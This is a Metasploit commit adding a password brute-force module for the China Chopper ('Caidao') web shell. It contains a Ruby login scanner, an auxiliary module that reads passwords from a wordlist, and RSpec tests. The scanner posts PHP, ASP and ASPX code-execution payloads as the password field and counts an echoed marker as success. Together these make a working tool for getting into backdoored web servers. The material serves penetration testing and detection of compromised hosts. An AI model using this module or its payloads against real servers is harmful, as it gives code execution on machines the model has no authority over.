Land rapid7#6411, chinese caidao asp/aspx/php backdoor bruteforce

wchen-r7 · wchen-r7 · commit 6e65d1d87100 · 2016-01-06T12:03:17.000-06:00
diff --git a/lib/metasploit/framework/login_scanner/caidao.rb b/lib/metasploit/framework/login_scanner/caidao.rb
@@ -0,0 +1,103 @@
+require 'metasploit/framework/login_scanner/http'
+
+module Metasploit
+  module Framework
+    module LoginScanner
+
+      # Chinese Caidao login scanner
+      class Caidao < HTTP
+        # Inherit LIKELY_PORTS, LIKELY_SERVICE_NAMES, and REALM_KEY from HTTP
+        DEFAULT_PORT       = 80
+        PRIVATE_TYPES      = [ :password ]
+        LOGIN_STATUS       = Metasploit::Model::Login::Status # Shorter name
+
+        # Checks if the target is Caidao Backdoor. The login module should call this.
+        #
+        # @return [Boolean] TrueClass if target is Caidao, otherwise FalseClass
+        def check_setup
+          @flag ||= Rex::Text.rand_text_alphanumeric(4)
+          @lmark ||= Rex::Text.rand_text_alphanumeric(4)
+          @rmark ||= Rex::Text.rand_text_alphanumeric(4)
+
+          case uri
+          when /php$/mi
+            @payload = "$_=\"#{@flag}\";echo \"#{@lmark}\".$_.\"#{@rmark}\";"
+            return true
+          when /asp$/mi
+            @payload = 'execute("response.write(""'
+            @payload << "#{@lmark}"
+            @payload << '""):response.write(""'
+            @payload << "#{@flag}"
+            @payload << '""):response.write(""'
+            @payload << "#{@rmark}"
+            @payload << '""):response.end")'
+            return true
+          when /aspx$/mi
+            @payload = "Response.Write(\"#{@lmark}\");"
+            @payload << "Response.Write(\"#{@flag}\");"
+            @payload << "Response.Write(\"#{@rmark}\")"
+            return true
+          end
+          false
+        end
+
+        def set_sane_defaults
+          self.method = "POST" if self.method.nil?
+        end
+
+        # Actually doing the login. Called by #attempt_login
+        #
+        # @param username [String] The username to try
+        # @param password [String] The password to try
+        # @return [Hash]
+        #   * :status [Metasploit::Model::Login::Status]
+        #   * :proof [String] the HTTP response body
+        def try_login(username, password)
+          res = send_request(
+            'method'  => method,
+            'uri'     => uri,
+            'data'    => "#{password}=#{@payload}"
+          )
+
+          unless res
+            return { :status => LOGIN_STATUS::UNABLE_TO_CONNECT, :proof => res.to_s }
+          end
+
+          if res && res.code == 200 && res.body.to_s.include?("#{@lmark}#{@flag}#{@rmark}")
+            return { :status => Metasploit::Model::Login::Status::SUCCESSFUL, :proof => res.to_s }
+          end
+
+          { :status => Metasploit::Model::Login::Status::INCORRECT, :proof => res.to_s }
+        end
+
+        # Attempts to login to Caidao Backdoor. This is called first.
+        #
+        # @param credential [Metasploit::Framework::Credential] The credential object
+        # @return [Result] A Result object indicating success or failure
+        def attempt_login(credential)
+          result_opts = {
+            credential:  credential,
+            status: Metasploit::Model::Login::Status::INCORRECT,
+            proof: nil,
+            host: host,
+            port: port,
+            protocol: 'tcp'
+          }
+
+          if ssl
+            result_opts[:service_name] = 'https'
+          else
+            result_opts[:service_name] = 'http'
+          end
+
+          begin
+            result_opts.merge!(try_login(credential.public, credential.private))
+          rescue ::Rex::ConnectionError => e
+            result_opts.merge!(status: LOGIN_STATUS::UNABLE_TO_CONNECT, proof: e.message)
+          end
+          Result.new(result_opts)
+        end
+      end
+    end
+  end
+end
diff --git a/modules/auxiliary/scanner/http/caidao_bruteforce_login.rb b/modules/auxiliary/scanner/http/caidao_bruteforce_login.rb
@@ -0,0 +1,133 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'metasploit/framework/credential_collection'
+require 'metasploit/framework/login_scanner/caidao'
+
+class Metasploit4 < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Scanner
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::AuthBrute
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Chinese Caidao Backdoor Bruteorce',
+      'Description'    => 'This module attempts to brute chinese caidao asp/php/aspx backdoor.',
+      'Author'         => [ 'Nixawk' ],
+      'References'     => [
+        ['URL', 'https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html'],
+        ['URL', 'https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html'],
+        ['URL', 'https://www.exploit-db.com/docs/27654.pdf'],
+        ['URL', 'https://www.us-cert.gov/ncas/alerts/TA15-313A'],
+        ['URL', 'http://blog.csdn.net/nixawk/article/details/40430329']
+      ],
+      'License'        => MSF_LICENSE
+    ))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The URL that handles the login process', '/caidao.php']),
+        OptPath.new('PASS_FILE', [
+          false,
+          'The file that contains a list of of probable passwords.',
+          File.join(Msf::Config.install_root, 'data', 'wordlists', 'unix_passwords.txt')
+        ])
+      ], self.class)
+
+    # caidao does not have an username, there's only password
+    deregister_options('USERNAME', 'USER_AS_PASS', 'USERPASS_FILE', 'USER_FILE', 'DB_ALL_USERS')
+  end
+
+  def scanner(ip)
+    @scanner ||= lambda {
+      cred_collection = Metasploit::Framework::CredentialCollection.new(
+        blank_passwords: datastore['BLANK_PASSWORDS'],
+        pass_file:       datastore['PASS_FILE'],
+        password:        datastore['PASSWORD'],
+        # The LoginScanner API refuses to run if there's no username, so we give it a fake one.
+        # But we will not be reporting this to the database.
+        username:        'caidao'
+      )
+
+      return Metasploit::Framework::LoginScanner::Caidao.new(
+        configure_http_login_scanner(
+          host: ip,
+          port: datastore['RPORT'],
+          uri: datastore['TARGETURI'],
+          cred_details:       cred_collection,
+          stop_on_success:    datastore['STOP_ON_SUCCESS'],
+          bruteforce_speed:   datastore['BRUTEFORCE_SPEED'],
+          connection_timeout: 5
+        ))
+    }.call
+  end
+
+  def report_good_cred(ip, port, result)
+    service_data = {
+      address: ip,
+      port: port,
+      service_name: 'http',
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      module_fullname: self.fullname,
+      origin_type: :service,
+      private_data: result.credential.private,
+      private_type: :password,
+    }.merge(service_data)
+
+    login_data = {
+      core: create_credential(credential_data),
+      last_attempted_at: DateTime.now,
+      status: result.status,
+      proof: result.proof
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
+  def report_bad_cred(ip, rport, result)
+    invalidate_login(
+      address: ip,
+      port: rport,
+      protocol: 'tcp',
+      private: result.credential.private,
+      realm_key: result.credential.realm_key,
+      realm_value: result.credential.realm,
+      status: result.status,
+      proof: result.proof
+    )
+  end
+
+  # Attempts to login
+  def bruteforce(ip)
+    scanner(ip).scan! do |result|
+      case result.status
+      when Metasploit::Model::Login::Status::SUCCESSFUL
+        print_brute(:level => :good, :ip => ip, :msg => "Success: '#{result.credential.private}'")
+        report_good_cred(ip, rport, result)
+      when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
+        vprint_brute(:level => :verror, :ip => ip, :msg => result.proof)
+        report_bad_cred(ip, rport, result)
+      when Metasploit::Model::Login::Status::INCORRECT
+        vprint_brute(:level => :verror, :ip => ip, :msg => "Failed: '#{result.credential.private}'")
+        report_bad_cred(ip, rport, result)
+      end
+    end
+  end
+
+  def run_host(ip)
+    unless scanner(ip).check_setup
+      print_brute(:level => :error, :ip => ip, :msg => 'Backdoor type is not support')
+      return
+    end
+
+    bruteforce(ip)
+  end
+end
diff --git a/spec/lib/metasploit/framework/login_scanner/caidao_spec.rb b/spec/lib/metasploit/framework/login_scanner/caidao_spec.rb
@@ -0,0 +1,144 @@
+require 'spec_helper'
+require 'metasploit/framework/login_scanner/caidao'
+
+RSpec.describe Metasploit::Framework::LoginScanner::Caidao do
+
+    it_behaves_like 'Metasploit::Framework::LoginScanner::Base',  has_realm_key: true, has_default_realm: false
+    it_behaves_like 'Metasploit::Framework::LoginScanner::RexSocket'
+
+    subject do
+      described_class.new
+    end
+
+    describe '#check_setup' do
+      context 'when uri is php' do
+        before do
+          allow(subject).to receive(:uri).and_return('php')
+        end
+
+        it 'returns true' do
+          expect(subject.check_setup).to be_truthy
+        end
+
+        it 'creates a php payload' do
+          subject.check_setup
+          expect(subject.instance_variable_get(:@payload)).to include(';echo ')
+        end
+      end
+
+      context 'when uri is asp' do
+        before do
+          allow(subject).to receive(:uri).and_return('asp')
+        end
+
+        it 'returns true' do
+          expect(subject.check_setup).to be_truthy
+        end
+
+        it 'creates an asp payload' do
+          subject.check_setup
+          expect(subject.instance_variable_get(:@payload)).to include('execute("response.write(')
+        end
+      end
+
+      context 'when uri is aspx' do
+        before do
+          allow(subject).to receive(:uri).and_return('aspx')
+        end
+
+        it 'returns true' do
+          expect(subject.check_setup).to be_truthy
+        end
+
+        it 'creates an aspx payload' do
+          subject.check_setup
+          expect(subject.instance_variable_get(:@payload)).to include('Response.Write')
+        end
+      end
+
+      context 'when uri is unexpected' do
+        before do
+          allow(subject).to receive(:uri).and_return('html')
+        end
+
+        it 'returns false' do
+          expect(subject.check_setup).to be_falsy
+        end
+
+        it 'creates no payload' do
+          expect(subject.instance_variable_get(:@payload)).to be_nil
+        end
+      end
+    end
+
+    describe '#try_login' do
+      let(:username) do
+        'username'
+      end
+
+      let(:password) do
+        'password'
+      end
+
+      context 'when the response is nil' do
+        before do
+          allow(subject).to receive(:send_request).and_return(nil)
+        end
+
+        it 'returns a hash' do
+          expect(subject.try_login(username, password)).to be_kind_of(Hash)
+        end
+
+        it 'returns the UNABLE_TO_CONNECT status in the hash' do
+          expect(subject.try_login(username, password)[:status]).to eq(Metasploit::Model::Login::Status::UNABLE_TO_CONNECT)
+        end
+      end
+
+      context 'when the response includes our flag' do
+        before do
+          allow(subject).to receive(:uri).and_return('php')
+          subject.check_setup
+          lmark = subject.instance_variable_get(:@lmark)
+          flag = subject.instance_variable_get(:@flag)
+          rmark = subject.instance_variable_get(:@rmark)
+          res = Rex::Proto::Http::Response.new
+          res.code = 200
+          res.body = "#{lmark}#{flag}#{rmark}"
+          allow(subject).to receive(:send_request).and_return(res)
+        end
+
+        it 'returns a hash' do
+          expect(subject.try_login(username, password)).to be_kind_of(Hash)
+        end
+
+        it 'returns the SUCCESSFUL status in the hash' do
+          expect(subject.try_login(username, password)[:status]).to eq(Metasploit::Model::Login::Status::SUCCESSFUL)
+        end
+      end
+
+      context 'when the response does not include our flag' do
+        before do
+          allow(subject).to receive(:uri).and_return('html')
+          res = Rex::Proto::Http::Response.new
+          allow(subject).to receive(:send_request).and_return(res)
+          subject.check_setup
+        end
+
+        it 'returns a hash' do
+          expect(subject.try_login(username, password)).to be_kind_of(Hash)
+        end
+
+        it 'returns the INCORRECT status in the hash' do
+          expect(subject.try_login(username, password)[:status]).to eq(Metasploit::Model::Login::Status::INCORRECT)
+        end
+      end
+    end
+
+    describe '#attempt_login' do
+      context 'when a login is attempted' do
+        it 'returns a Result object' do
+        end
+      end
+    end
+
+end
